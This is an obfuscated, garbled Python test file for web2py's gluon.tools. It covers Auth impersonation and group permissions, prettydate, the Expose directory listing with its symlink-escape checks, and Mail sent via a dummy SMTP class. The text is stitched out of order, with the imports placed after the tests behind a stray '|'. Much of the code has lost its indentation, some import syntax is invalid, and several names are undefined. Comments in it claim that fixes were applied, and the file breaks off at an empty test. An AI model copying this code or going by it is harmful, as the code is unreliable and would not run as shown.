def FUNC_28(self):
self.auth.get_or_create_user(dict(first_name='Omer',
last_name='Simpson',
VAR_17='omer',
email='omer@test.com',
VAR_18='password_omer',
registration_key='',
registration_id=''),
FUNC_64=False)
self.db.commit()
self.assertFalse(self.auth.is_logged_in())
VAR_38 = self.auth.add_group('impersonate')
self.auth.add_membership(VAR_43=self.db(self.db.auth_user.username == 'bart'
).select(self.db.auth_user.id).first().id,
VAR_38=group_id)
self.auth.add_permission(VAR_38=group_id,
name='impersonate',
table_name='auth_user',
record_id=0)
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.is_logged_in())
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.assertEqual(self.auth.user_id, VAR_30)
self.assertEqual(self.auth.impersonate().xml(),
b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="no_table_user_id__row"><td class="w2p_fl"><label class="" for="no_table_user_id" id="no_table_user_id__label">User Id: </label></td><td class="w2p_fw"><input class="integer" id="no_table_user_id" name="user_id" type="text" value="" /></td><td class="w2p_fc"></td></tr><tr id="submit_record__row"><td class="w2p_fl"></td><td class="w2p_fw"><input type="submit" value="Submit" /></td><td class="w2p_fc"></td></tr></table></form>')
self.assertEqual(self.auth.impersonate(VAR_30), None)
self.assertFalse(self.auth.is_impersonating()) # User shouldn't impersonate itself?
VAR_39 = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
VAR_40 = self.auth.impersonate(VAR_43=VAR_39)
self.assertTrue(self.auth.is_impersonating())
self.assertEqual(self.auth.user_id, VAR_39) # we make it really sure
self.assertEqual(VAR_40.xml(),
b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="auth_user_id__row"><td class="w2p_fl"><label class="readonly" for="auth_user_id" id="auth_user_id__label">Id: </label></td><td class="w2p_fw"><span id="auth_user_id">2</span></td><td class="w2p_fc"></td></tr><tr id="auth_user_first_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_first_name" id="auth_user_first_name__label">First name: </label></td><td class="w2p_fw">Omer</td><td class="w2p_fc"></td></tr><tr id="auth_user_last_name__row"><td class="w2p_fl"><label class="readonly" for="auth_user_last_name" id="auth_user_last_name__label">Last name: </label></td><td class="w2p_fw">Simpson</td><td class="w2p_fc"></td></tr><tr id="auth_user_email__row"><td class="w2p_fl"><label class="readonly" for="auth_user_email" id="auth_user_email__label">E-VAR_20: </label></td><td class="w2p_fw">omer@test.com</td><td class="w2p_fc"></td></tr><tr id="auth_user_username__row"><td class="w2p_fl"><label class="readonly" for="auth_user_username" id="auth_user_username__label">Username: </label></td><td class="w2p_fw">omer</td><td class="w2p_fc"></td></tr></table><div style="display:none;"><input name="id" type="hidden" value="2" /></div></form>')
self.auth.logout_bare()
self.auth.login_user(self.db(self.db.auth_user.username == 'omer').select().first()) # bypass login_bare()
self.myassertRaisesRegex(HTTP, "403*", self.auth.impersonate, VAR_30)
self.auth.logout_bare()
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate, 1000) # VAR_42 with id 1000 shouldn't exist
self.auth.impersonate(VAR_43=VAR_39)
self.assertTrue(self.auth.is_impersonating())
self.assertEqual(self.auth.impersonate(VAR_43=0), None)
def FUNC_29(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertEqual(self.auth.groups().xml(),
b'<table><tr><td><h3>user_1(1)</h3></td></tr><tr><td><p></p></td></tr></table>')
def FUNC_30(self):
self.current.request.ajax = 'facke_ajax_request'
self.myassertRaisesRegex(HTTP, "403*", self.auth.not_authorized)
self.current.request.ajax = None
self.assertEqual(self.auth.not_authorized(), self.auth.messages.access_denied)
def FUNC_12(self):
self.myassertRaisesRegex(HTTP, "400*", self.auth.allows_jwt)
def FUNC_31(self):
self.assertEqual(self.auth.add_group(role='a_group', description='a_group_role_description'),
self.db(self.db.auth_group.role == 'a_group').select(self.db.auth_group.id).first().id)
def FUNC_32(self):
VAR_31 = 1 # Should be group 1, 'user_1'
self.assertEqual(self.auth.del_group(VAR_38=VAR_31), None)
def FUNC_33(self):
self.assertEqual(self.auth.id_group(role='user_1'), 1)
self.assertEqual(self.auth.id_group(role='non_existing_role_name'), None)
def FUNC_34(self):
self.assertEqual(self.auth.user_group(VAR_43=1), 1)
def FUNC_35(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_41 = 'user_%s' % self.db(self.db.auth_user.username == 'bart'
).select(self.db.auth_user.id).first().id
self.assertEqual(self.auth.user_group_role(), VAR_41)
self.auth.logout_bare()
self.assertEqual(self.auth.user_group_role(VAR_43=1), 'user_1')
self.auth.settings.create_user_groups = None
self.assertEqual(self.auth.user_group_role(VAR_43=1), None)
def FUNC_36(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.has_membership('user_1'))
self.assertFalse(self.auth.has_membership('user_555'))
self.assertTrue(self.auth.has_membership(VAR_38=1))
self.auth.logout_bare()
self.assertTrue(self.auth.has_membership(role='user_1', VAR_43=1))
self.assertTrue(self.auth.has_membership(VAR_38=1, VAR_43=1))
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.assertTrue(self.auth.has_membership(VAR_38=1, VAR_43=1))
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
def FUNC_37(self):
VAR_42 = self.db(self.db.auth_user.username == 'bart').select().first() # bypass login_bare()
VAR_43 = VAR_42.id
VAR_44 = 'test_add_membership_group'
VAR_38 = self.auth.add_group(VAR_44)
self.assertFalse(self.auth.has_membership(VAR_44))
self.auth.add_membership(VAR_38=group_id, VAR_43=user_id)
self.assertTrue(self.auth.has_membership(VAR_38, VAR_43=user_id))
self.auth.del_membership(VAR_38=group_id, VAR_43=user_id)
self.assertFalse(self.auth.has_membership(VAR_38, VAR_43=user_id))
self.auth.add_membership(role=VAR_44, VAR_43=user_id)
self.assertTrue(self.auth.has_membership(VAR_38, VAR_43=user_id))
self.auth.del_membership(VAR_38=group_id, VAR_43=user_id)
self.assertFalse(self.auth.has_membership(VAR_38, VAR_43=user_id))
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(VAR_38='not_existing_group_name', VAR_43=user_id)
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(role='not_existing_role_name', VAR_43=user_id)
with self.myassertRaisesRegex(ValueError, '^VAR_43 not provided or invalid$'):
self.auth.add_membership(VAR_38=group_id, VAR_43=None)
with self.myassertRaisesRegex(ValueError, '^VAR_43 not provided or invalid$'):
self.auth.add_membership(role=VAR_44, VAR_43=None)
self.auth.login_user(VAR_42)
self.auth.add_membership(VAR_38=group_id)
self.assertTrue(self.auth.has_membership(VAR_38))
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
self.auth.add_membership(role=VAR_44)
self.assertTrue(self.auth.has_membership(VAR_38))
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
self.auth.add_membership(VAR_44)
self.assertTrue(self.auth.has_membership(VAR_38))
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
VAR_45 = self.auth.add_membership(VAR_38)
self.assertTrue(self.auth.has_membership(VAR_38))
VAR_46 = self.auth.add_membership(VAR_38)
self.assertEqual(VAR_45, VAR_46)
self.auth.del_membership(VAR_38=group_id)
self.assertFalse(self.auth.has_membership(VAR_38))
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(VAR_38='not_existing_group_name')
with self.myassertRaisesRegex(ValueError, '^VAR_38 not provided or invalid$'):
self.auth.add_membership(role='not_existing_role_name')
def FUNC_38(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_33 = self.db(self.db.auth_event.id > 0).count()
VAR_47 = self.db(self.db.auth_membership.group_id == self.auth.id_group('user_1')
).select(self.db.auth_membership.id).first().id
self.assertEqual(self.auth.del_membership('user_1'), VAR_47)
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
VAR_38 = self.auth.add_group('some_test_group')
VAR_48 = self.auth.add_membership('some_test_group')
self.assertEqual(self.auth.user_groups[VAR_38], 'some_test_group')
self.auth.logout_bare()
self.assertFalse(self.auth.del_membership('some_test_group'))
self.assertEqual(set(self.db.auth_membership(VAR_48).as_dict().items()),
set({'group_id': 2, 'user_id': 1, 'id': 2}.items())) # is not deleted
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.assertTrue(self.auth.del_membership('some_test_group', VAR_43=VAR_30))
self.assertEqual(self.db.auth_membership(VAR_48), None) # is really deleted
def FUNC_39(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
name='some_permission',
table_name='auth_user',
record_id=0,
)
self.assertTrue(self.auth.has_permission(name='some_permission',
table_name='auth_user',
record_id=0,
VAR_43=VAR_30,
VAR_38=self.auth.id_group('user_1')))
self.assertFalse(self.auth.has_permission(name='some_other_permission',
table_name='auth_user',
record_id=0,
VAR_43=VAR_30,
VAR_38=self.auth.id_group('user_1')))
def FUNC_40(self):
VAR_33 = self.db(self.db.auth_event.id > 0).count()
VAR_49 = \
self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
name='some_permission',
table_name='auth_user',
record_id=0,
)
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
VAR_50 = \
self.db(self.db.auth_permission.id == VAR_49).count()
self.assertTrue(VAR_50)
VAR_50 = \
self.db((self.db.auth_permission.group_id == self.auth.id_group('user_1')) &
(self.db.auth_permission.name == 'no_permission') &
(self.db.auth_permission.table_name == 'no_table') &
(self.db.auth_permission.record_id == 0)).count()
self.assertFalse(VAR_50)
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_49 = \
self.auth.add_permission(VAR_38=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
VAR_51 = \
self.db(self.db.auth_permission.id == VAR_49).select(self.db.auth_permission.name).first().name
self.assertEqual(VAR_51, 'user_1_permission')
VAR_49 =\
self.auth.add_permission(VAR_38=0,
name='user_1_permission',
table_name='auth_user',
record_id=0,
)
self.assertTrue(VAR_49)
def FUNC_41(self):
VAR_49 = \
self.auth.add_permission(VAR_38=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,
)
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.assertTrue(self.auth.del_permission(VAR_38=self.auth.id_group('user_1'),
name='del_permission_test',
table_name='auth_user',
record_id=0,))
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
VAR_50 = \
self.db(self.db.auth_permission.id == VAR_49).count()
self.assertFalse(VAR_50)
class CLASS_3(unittest.TestCase):
def FUNC_42(self):
VAR_52 = datetime.datetime.now()
self.assertEqual(prettydate(VAR_78=VAR_52), 'now')
VAR_53 = VAR_52 - datetime.timedelta(seconds=1)
self.assertEqual(prettydate(VAR_78=VAR_53), '1 second ago')
VAR_54 = VAR_52 - datetime.timedelta(seconds=2)
self.assertEqual(prettydate(VAR_78=VAR_54), '2 seconds ago')
VAR_55 = VAR_52 - datetime.timedelta(seconds=60)
self.assertEqual(prettydate(VAR_78=VAR_55), '1 minute ago')
VAR_56 = VAR_52 - datetime.timedelta(seconds=61)
self.assertEqual(prettydate(VAR_78=VAR_56), '1 minute ago')
VAR_57 = VAR_52 - datetime.timedelta(seconds=120)
self.assertEqual(prettydate(VAR_78=VAR_57), '2 minutes ago')
VAR_58 = VAR_52 - datetime.timedelta(seconds=121)
self.assertEqual(prettydate(VAR_78=VAR_58), '2 minutes ago')
VAR_59 = VAR_52 - datetime.timedelta(seconds=60 * 60)
self.assertEqual(prettydate(VAR_78=VAR_59), '1 hour ago')
VAR_60 = VAR_52 - datetime.timedelta(seconds=3601)
self.assertEqual(prettydate(VAR_78=VAR_60), '1 hour ago')
VAR_61 = VAR_52 - datetime.timedelta(seconds=2 * 60 * 60)
self.assertEqual(prettydate(VAR_78=VAR_61), '2 hours ago')
VAR_62 = VAR_52 - datetime.timedelta(seconds=2 * 60 * 60 + 1)
self.assertEqual(prettydate(VAR_78=VAR_62), '2 hours ago')
VAR_63 = VAR_52 - datetime.timedelta(days=1)
self.assertEqual(prettydate(VAR_78=VAR_63), '1 day ago')
VAR_64 = VAR_52 - datetime.timedelta(days=2)
self.assertEqual(prettydate(VAR_78=VAR_64), '2 days ago')
VAR_65 = VAR_52 - datetime.timedelta(days=7)
self.assertEqual(prettydate(VAR_78=VAR_65), '1 week ago')
VAR_66 = VAR_52 - datetime.timedelta(days=8)
self.assertEqual(prettydate(VAR_78=VAR_66), '1 week ago')
VAR_67 = VAR_52 - datetime.timedelta(days=14)
self.assertEqual(prettydate(VAR_78=VAR_67), '2 weeks ago')
VAR_68 = VAR_52 - datetime.timedelta(days=15)
self.assertEqual(prettydate(VAR_78=VAR_68), '2 weeks ago')
VAR_69 = VAR_52 - datetime.timedelta(days=21)
self.assertEqual(prettydate(VAR_78=VAR_69), '3 weeks ago')
VAR_70 = VAR_52 - datetime.timedelta(days=27)
self.assertEqual(prettydate(VAR_78=VAR_70), '1 month ago')
VAR_71 = VAR_52 - datetime.timedelta(days=28)
self.assertEqual(prettydate(VAR_78=VAR_71), '1 month ago')
VAR_72 = VAR_52 - datetime.timedelta(days=60)
self.assertEqual(prettydate(VAR_78=VAR_72), '2 months ago')
VAR_73 = VAR_52 - datetime.timedelta(days=90)
self.assertEqual(prettydate(VAR_78=VAR_73), '3 months ago')
VAR_74 = VAR_52 - datetime.timedelta(days=365)
self.assertEqual(prettydate(VAR_78=VAR_74), '1 year ago')
VAR_75 = VAR_52 - datetime.timedelta(days=366)
self.assertEqual(prettydate(VAR_78=VAR_75), '1 year ago')
VAR_76 = VAR_52 - datetime.timedelta(days=2 * 365)
self.assertEqual(prettydate(VAR_78=VAR_76), '2 years ago')
VAR_77 = VAR_52 - datetime.timedelta(days=2 * 365 + 1)
self.assertEqual(prettydate(VAR_78=VAR_77), '2 years ago')
VAR_78 = VAR_52.date()
self.assertEqual(prettydate(VAR_78=d), 'now')
VAR_63 = VAR_52.date() - datetime.timedelta(days=1)
self.assertEqual(prettydate(VAR_78=VAR_63), '1 day ago')
VAR_79 = VAR_52.date() - datetime.timedelta(days=2)
self.assertEqual(prettydate(VAR_78=VAR_79), '2 days ago')
VAR_80 = VAR_52 - datetime.timedelta(seconds=-65)
self.assertEqual(prettydate(VAR_78=VAR_80), '1 minute from now')
VAR_81 = VAR_52 - datetime.timedelta(hours=-23.5)
self.assertEqual(prettydate(VAR_78=VAR_81), '23 hours from now')
VAR_82 = VAR_52 - datetime.timedelta(days=-366)
self.assertEqual(prettydate(VAR_78=VAR_82), '1 year from now')
VAR_52 = datetime.datetime.utcnow()
self.assertEqual(prettydate(VAR_78=VAR_52, utc=True), 'now')
VAR_53 = VAR_52 - datetime.timedelta(seconds=1)
self.assertEqual(prettydate(VAR_78=VAR_53, utc=True), '1 second ago')
self.assertEqual(prettydate(VAR_78=None), '')
self.assertEqual(prettydate(VAR_78='invalid_date'), '[invalid date]')
VAR_2 = os.path.join
def FUNC_0():
    """Return True when running on a POSIX platform (symlink tests need it)."""
    is_posix = (os.name == 'posix')
    return is_posix
class CLASS_4(unittest.TestCase):
    """Tests for the private Expose.__in_base path-containment helper."""

    def FUNC_43(self):
        """Paths inside (or equal to) the base directory are accepted."""
        inside_cases = (
            ('/foo/bar', '/foo'),
            ('/foo', '/foo'),
            ('/foo', '/'),
            ('/', '/'),
        )
        for subdir, basedir in inside_cases:
            self.assertTrue(
                Expose._Expose__in_base(subdir=subdir, basedir=basedir, sep='/'),
                '%s is not under %s' % (subdir, basedir))

    def FUNC_44(self):
        """Paths outside the base dir (including prefix lookalikes) are rejected."""
        outside_cases = (
            ('/foobar', '/foo'),
            ('/foo', '/foo/bar'),
            ('/bar', '/foo'),
            ('/foo/bar', '/bar'),
            ('/', '/x'),
        )
        for subdir, basedir in outside_cases:
            self.assertFalse(
                Expose._Expose__in_base(subdir=subdir, basedir=basedir, sep='/'),
                '%s should not be under %s' % (subdir, basedir))
class CLASS_5(unittest.TestCase):
    """Tests for gluon.tools.Expose: listing, symlink policy and XML output.

    FUNC_1 (apparently the unittest setUp hook, renamed by obfuscation)
    builds a throwaway tree:

        base_dir/inside/dir1/{file1,file2}
        base_dir/inside/dir2/           (symlinks into dir1 on POSIX)
        base_dir/inside/README
        base_dir/outside/file3          (outside the exposed root)

    Fixes applied: helper methods were defined under obfuscated names
    (FUNC_45..FUNC_50, FUNC_57, FUNC_58) but invoked as self.make_dirs,
    self.touch_files, ... — definitions renamed to match the call sites;
    two lambdas and the Expose() call referenced undefined names
    (`args`, `follow_symlink_out`) left behind by the renaming.
    """

    def FUNC_1(self):
        # NOTE(review): plays the role of unittest's setUp.
        self.base_dir = tempfile.mkdtemp()
        self.make_dirs()
        self.touch_files()
        self.make_readme()
        if FUNC_0():
            self.make_symlinks()
        self.set_expectations()
        # Fixed: lambda body referenced undefined `args`; bind the lambda's
        # own parameter to URL's `args` keyword instead.
        tools.URL = lambda VAR_3: URL(a='a', c='c', f='f', args=VAR_3)

    def FUNC_2(self):
        # NOTE(review): plays the role of unittest's tearDown.
        tools.URL = URL
        shutil.rmtree(self.base_dir)

    def make_dirs(self):
        # Directory skeleton (renamed from FUNC_45 to match the FUNC_1 call).
        for parts in (['inside'],
                      ['inside', 'dir1'],
                      ['inside', 'dir2'],
                      ['outside']):
            os.mkdir(VAR_2(self.base_dir, *parts))

    def touch_files(self):
        # Empty files inside and outside the exposed tree (was FUNC_46).
        for f in (['inside', 'dir1', 'file1'],
                  ['inside', 'dir1', 'file2'],
                  ['outside', 'file3']):
            with open(VAR_2(self.base_dir, *f), 'a'):
                pass

    def make_readme(self):
        # A non-empty file at the exposed root (was FUNC_47).
        with open(VAR_2(self.base_dir, 'inside', 'README'), 'w') as f:
            f.write('README content')

    def make_symlinks(self):
        # POSIX only (was FUNC_48): links staying inside the tree and links
        # escaping it, for the follow_symlink_out tests.
        os.symlink(
            VAR_2(self.base_dir, 'inside', 'dir1'),
            VAR_2(self.base_dir, 'inside', 'dir2', 'link_to_dir1'))
        os.symlink(
            VAR_2(self.base_dir, 'inside', 'dir1', 'file1'),
            VAR_2(self.base_dir, 'inside', 'dir2', 'link_to_file1'))
        os.symlink(
            VAR_2(self.base_dir, 'outside'),
            VAR_2(self.base_dir, 'inside', 'link_to_outside'))
        os.symlink(
            VAR_2(self.base_dir, 'outside', 'file3'),
            VAR_2(self.base_dir, 'inside', 'link_to_file3'))

    def set_expectations(self):
        # Expected HTML tables per exposed directory (was FUNC_49).
        # Fixed: the helper lambda's body referenced undefined `args`.
        VAR_85 = lambda VAR_3: URL('a', 'c', 'f', args=VAR_3)
        self.expected_folders = {}
        self.expected_folders['inside'] = SPAN(H3('Folders'), TABLE(
            TR(TD(A('dir1', _href=VAR_85(VAR_3=['dir1'])))),
            TR(TD(A('dir2', _href=VAR_85(VAR_3=['dir2'])))),
            _class='table',
        ))
        self.expected_folders[VAR_2('inside', 'dir1')] = ''
        if FUNC_0():
            self.expected_folders[VAR_2('inside', 'dir2')] = SPAN(H3('Folders'), TABLE(
                TR(TD(A('link_to_dir1', _href=VAR_85(VAR_3=['dir2', 'link_to_dir1'])))),
                _class='table',
            ))
        else:
            self.expected_folders[VAR_2('inside', 'dir2')] = ''
        self.expected_files = {}
        self.expected_files['inside'] = SPAN(H3('Files'), TABLE(
            TR(TD(A('README', _href=VAR_85(VAR_3=['README']))), TD('')),
            _class='table',
        ))
        self.expected_files[VAR_2('inside', 'dir1')] = SPAN(H3('Files'), TABLE(
            TR(TD(A('file1', _href=VAR_85(VAR_3=['dir1', 'file1']))), TD('')),
            TR(TD(A('file2', _href=VAR_85(VAR_3=['dir1', 'file2']))), TD('')),
            _class='table',
        ))
        if FUNC_0():
            self.expected_files[VAR_2('inside', 'dir2')] = SPAN(H3('Files'), TABLE(
                TR(TD(A('link_to_file1', _href=VAR_85(VAR_3=['dir2', 'link_to_file1']))), TD('')),
                _class='table',
            ))
        else:
            self.expected_files[VAR_2('inside', 'dir2')] = ''

    def make_expose(self, VAR_5, VAR_6='', VAR_7=False):
        """Build an Expose rooted at base_dir/VAR_5 for request args VAR_6.

        VAR_5: base directory name; VAR_6: slash-joined request args;
        VAR_7: whether symlinks escaping the tree may be followed.
        (Renamed from FUNC_50 to match the call sites below.)
        """
        current.request = Request(env={})
        current.request.raw_args = VAR_6
        current.request.args = VAR_6.split('/')
        # Fixed: keywords referenced undefined names after obfuscation;
        # restored to Expose's `base` and `follow_symlink_out` parameters.
        return Expose(base=VAR_2(self.base_dir, VAR_5),
                      basename=VAR_5,
                      follow_symlink_out=VAR_7)

    def FUNC_51(self):
        VAR_86 = self.make_expose(VAR_5='inside', VAR_6='')
        self.assertEqual(VAR_86.args, [])
        self.assertEqual(VAR_86.folders, ['dir1', 'dir2'])
        self.assertEqual(VAR_86.filenames, ['README'])

    @unittest.skipUnless(FUNC_0(), 'requires symlinks')
    def FUNC_52(self):
        VAR_86 = self.make_expose(VAR_5='inside', VAR_6='',
                                  VAR_7=True)
        self.assertEqual(VAR_86.args, [])
        self.assertEqual(VAR_86.folders, ['dir1', 'dir2', 'link_to_outside'])
        self.assertEqual(VAR_86.filenames, ['README', 'link_to_file3'])

    def FUNC_53(self):
        VAR_86 = self.make_expose(VAR_5='inside', VAR_6='dir1')
        self.assertEqual(VAR_86.args, ['dir1'])
        self.assertEqual(VAR_86.folders, [])
        self.assertEqual(VAR_86.filenames, ['file1', 'file2'])

    def FUNC_54(self):
        VAR_86 = self.make_expose(VAR_5='inside', VAR_6='dir2')
        self.assertEqual(VAR_86.args, ['dir2'])
        if FUNC_0():
            self.assertEqual(VAR_86.folders, ['link_to_dir1'])
            self.assertEqual(VAR_86.filenames, ['link_to_file1'])
        else:
            self.assertEqual(VAR_86.folders, [])
            self.assertEqual(VAR_86.filenames, [])

    def FUNC_55(self):
        # Exposing the whole base_dir: in-tree symlinks are listed on POSIX.
        VAR_86 = self.make_expose(VAR_5='', VAR_6='inside')
        self.assertEqual(VAR_86.args, ['inside'])
        if FUNC_0():
            self.assertEqual(VAR_86.folders, ['dir1', 'dir2', 'link_to_outside'])
            self.assertEqual(VAR_86.filenames, ['README', 'link_to_file3'])
        else:
            self.assertEqual(VAR_86.folders, ['dir1', 'dir2'])
            self.assertEqual(VAR_86.filenames, ['README'])

    def FUNC_56(self):
        VAR_86 = self.make_expose(VAR_5='', VAR_6='inside/dir2')
        self.assertEqual(VAR_86.args, ['inside', 'dir2'])
        if FUNC_0():
            self.assertEqual(VAR_86.folders, ['link_to_dir1'])
            self.assertEqual(VAR_86.filenames, ['link_to_file1'])
        else:
            self.assertEqual(VAR_86.folders, [])
            self.assertEqual(VAR_86.filenames, [])

    def assertSameXML(self, VAR_8, VAR_9):
        # Compare helpers/strings by their serialized XML (was FUNC_57).
        self.assertEqual(VAR_8 if isinstance(VAR_8, str) else VAR_8.xml(),
                         VAR_9 if isinstance(VAR_9, str) else VAR_9.xml())

    def run_test_xml_for(self, VAR_5, VAR_6):
        """Check table_files()/table_folders() against the expectations (was FUNC_58)."""
        VAR_86 = self.make_expose(VAR_5, VAR_6)
        VAR_87 = VAR_2(VAR_5, VAR_6).rstrip(os.path.sep)
        self.assertSameXML(VAR_86.table_files(), self.expected_files[VAR_87])
        self.assertSameXML(VAR_86.table_folders(), self.expected_folders[VAR_87])

    def FUNC_59(self):
        self.run_test_xml_for(VAR_5='inside', VAR_6='')

    def FUNC_60(self):
        self.run_test_xml_for(VAR_5='inside', VAR_6='dir1')

    def FUNC_61(self):
        self.run_test_xml_for(VAR_5='inside', VAR_6='dir2')

    def FUNC_62(self):
        # Unknown paths must raise HTTP (not found).
        with self.assertRaises(HTTP):
            self.make_expose(VAR_5='inside', VAR_6='dir1/file_not_found')

    def FUNC_30(self):
        # A symlink escaping the exposed tree must be refused by default.
        with self.assertRaises(HTTP):
            self.make_expose(VAR_5='inside', VAR_6='link_to_file3')
|
import os
import sys
import shutil
import tempfile
import smtplib
import .datetime
import unittest
VAR_0 = os.getenv('DB', 'sqlite:memory')
from gluon.dal import DAL, Field
from pydal.objects import .Table
from gluon import .tools
from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose, prevent_open_redirect
from gluon._compat import PY2, to_bytes
from gluon.globals import Request, Response, Session
from gluon.storage import Storage
from gluon.languages import .TranslatorFactory
from gluon.http import HTTP
from gluon import SPAN, H3, TABLE, TR, TD, A, URL, current
# True when the configured DB URI (VAR_0) targets an IMAP adapter; used to
# skip Auth tests that cannot run against IMAP.
VAR_1 = "imap" in VAR_0
class VAR_23(unittest.TestCase):
    """Tests for gluon.tools.Mail, using an in-process SMTP double.

    FUNC_1/FUNC_2 (apparently the setUp/tearDown hooks, renamed by
    obfuscation) swap smtplib.SMTP / smtplib.SMTP_SSL for DummySMTP so
    Mail.send() deliveries land in DummySMTP.inbox instead of the network.

    Fixes applied: the inner classes and several members carried obfuscated
    definition names (CLASS_7, CLASS_8, VAR_13, VAR_14, FUNC_64, FUNC_65...)
    while every reference used the real names (VAR_23.Message,
    VAR_23.DummySMTP, self.inbox, self.users, .parsed_payload, and the
    smtplib API methods) — definitions renamed to match; `stream.close()`
    referenced an undefined name; Mail.send keyword names restored to
    `to=`/`message=`.
    """

    class Message(object):
        """One captured outbound mail: sender, recipients, raw payload."""

        def __init__(self, VAR_10, VAR_11, VAR_12):
            self.sender = VAR_10          # envelope sender address
            self.to = VAR_11              # list of recipient addresses
            self.payload = VAR_12         # raw RFC 2822 payload text
            self._parsed_payload = None   # lazily parsed message object

        @property
        def parsed_payload(self):
            """Parse self.payload once with the stdlib email package."""
            if self._parsed_payload is None:
                import email
                self._parsed_payload = email.message_from_string(self.payload)
            return self._parsed_payload

    class DummySMTP(object):
        """Minimal stand-in for smtplib.SMTP: records mail instead of sending."""

        inbox = []   # class-level: messages delivered via sendmail()
        users = {}   # class-level: username -> password accepted by login()

        def __init__(self, VAR_15, VAR_16, **VAR_4):
            self.address = VAR_15
            self.port = VAR_16
            self.has_quit = False
            self.tls = False

        def login(self, VAR_17, VAR_18):
            # Mimic smtplib's behaviour on unknown/wrong credentials.
            if VAR_17 not in self.users or self.users[VAR_17] != VAR_18:
                raise smtplib.SMTPAuthenticationError
            self.username = VAR_17
            self.password = VAR_18

        def sendmail(self, VAR_10, VAR_11, VAR_12):
            self.inbox.append(VAR_23.Message(VAR_10, VAR_11, VAR_12))

        def quit(self):
            self.has_quit = True

        def ehlo(self, VAR_19=None):
            pass

        def starttls(self):
            self.tls = True

    def FUNC_1(self):
        # Patch smtplib so Mail.send() talks to DummySMTP (setUp role).
        self.original_SMTP = smtplib.SMTP
        self.original_SMTP_SSL = smtplib.SMTP_SSL
        smtplib.SMTP = VAR_23.DummySMTP
        smtplib.SMTP_SSL = VAR_23.DummySMTP

    def FUNC_2(self):
        # Restore the real smtplib classes (tearDown role).
        smtplib.SMTP = self.original_SMTP
        smtplib.SMTP_SSL = self.original_SMTP_SSL

    def FUNC_3(self):
        # Plain-text send: headers and body reach the (fake) server intact.
        VAR_20 = Mail()
        VAR_20.settings.server = 'smtp.example.com:25'
        VAR_20.settings.sender = 'you@example.com'
        self.assertTrue(VAR_20.send(to=['somebody@example.com'],
                                    subject='hello',
                                    reply_to='us@example.com',
                                    message='world'))
        VAR_21 = VAR_23.DummySMTP.inbox.pop()
        self.assertEqual(VAR_21.sender, VAR_20.settings.sender)
        self.assertEqual(VAR_21.to, ['somebody@example.com'])
        VAR_22 = "To: somebody@example.com\nReply-To: us@example.com\nSubject: hello\n"
        self.assertTrue(VAR_22 in VAR_21.payload)
        self.assertTrue(VAR_21.payload.endswith('world'))

    def FUNC_4(self):
        # Login against a server that knows no users -> send() returns False.
        VAR_20 = Mail()
        VAR_20.settings.server = 'smtp.example.com:25'
        VAR_20.settings.sender = 'you@example.com'
        VAR_20.settings.login = 'username:password'
        self.assertFalse(VAR_20.send(to=['somebody@example.com'],
                                     subject='hello',
                                     reply_to='us@example.com',
                                     message='world'))

    def FUNC_5(self):
        # Successful authenticated send once the credentials are registered.
        VAR_23.DummySMTP.users['username'] = 'password'
        VAR_20 = Mail()
        VAR_20.settings.server = 'smtp.example.com:25'
        VAR_20.settings.sender = 'you@example.com'
        VAR_20.settings.login = 'username:password'
        self.assertTrue(VAR_20.send(to=['somebody@example.com'],
                                    subject='hello',
                                    reply_to='us@example.com',
                                    message='world'))
        del VAR_23.DummySMTP.users['username']
        VAR_23.DummySMTP.inbox.pop()

    def FUNC_6(self):
        # An HTML-looking body is sent with a text/html content type.
        VAR_20 = Mail()
        VAR_20.settings.server = 'smtp.example.com:25'
        VAR_20.settings.sender = 'you@example.com'
        self.assertTrue(VAR_20.send(to=['somebody@example.com'],
                                    subject='hello',
                                    reply_to='us@example.com',
                                    message='<html><head></head><body></body></html>'))
        VAR_21 = VAR_23.DummySMTP.inbox.pop()
        self.assertTrue('Content-Type: text/html' in VAR_21.payload)

    def FUNC_7(self):
        # (text, html) tuple -> multipart/alternative with both parts.
